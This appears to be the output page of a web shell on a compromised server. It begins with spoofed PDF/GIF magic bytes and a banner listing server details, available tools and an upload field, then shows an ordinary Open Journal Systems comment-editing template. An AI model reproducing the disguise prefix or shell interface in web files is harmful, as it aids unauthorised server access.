%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/JberJournal/templates/submission/comment/ |
Upload File : |
{**
* templates/submission/comment/editComment.tpl
*
* Copyright (c) 2003-2012 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Form to edit comments.
*
*}
{strip}
{assign var="pageTitle" value="submission.comments.editComment"}
{include file="submission/comment/header.tpl"}
{/strip}
<form method="post" action="{url op="saveComment" path=$commentId}">
{if $hiddenFormParams}
{foreach from=$hiddenFormParams item=hiddenFormParam key=key}
<input type="hidden" name="{$key|escape}" value="{$hiddenFormParam|escape}" />
{/foreach}
{/if}
{if $isPeerReviewComment}
<input type="hidden" name="viewable" value="{$viewable|escape}" />
{/if}
<div id="new">
{include file="common/formErrors.tpl"}
<table class="data">
<tr valign="top">
<td width="20%" class="label">{fieldLabel name="commentTitle" key="submission.comments.subject"}</td>
<td width="80%" class="value"><input type="text" id="commentTitle" name="commentTitle" value="{$commentTitle|escape}" size="50" maxlength="255" class="textField" /></td>
</tr>
<tr valign="top">
<td class="label">{fieldLabel name="comments" key="submission.comments.comments" required="true"}</td>
<td class="value"><textarea name="comments" id="comments" rows="15" cols="50" class="textArea">{$comments}</textarea></td>
</tr>
{if $isPeerReviewComment}
<tr valign="top">
<td> </td>
<td class="value">
<input type="checkbox" name="viewable" id="viewable" value="1"{if $viewable} checked="checked"{/if} />
<label for="viewable">{translate key="submission.comments.viewableDescription"}</label>
</td>
</tr>
{/if}
</table>
<p><input type="submit" value="{translate key="common.save"}" class="button defaultButton" /> {if !$isPeerReviewComment}<input type="submit" name="saveAndEmail" value="{translate key="common.saveAndEmail"}" class="button" /> {/if}<input type="button" value="{translate key="common.cancel"}" class="button" onclick="history.go(-1);" /></p>
<p><span class="formRequired">{translate key="common.requiredField"}</span></p>
</div>
</form>
{include file="submission/comment/footer.tpl"}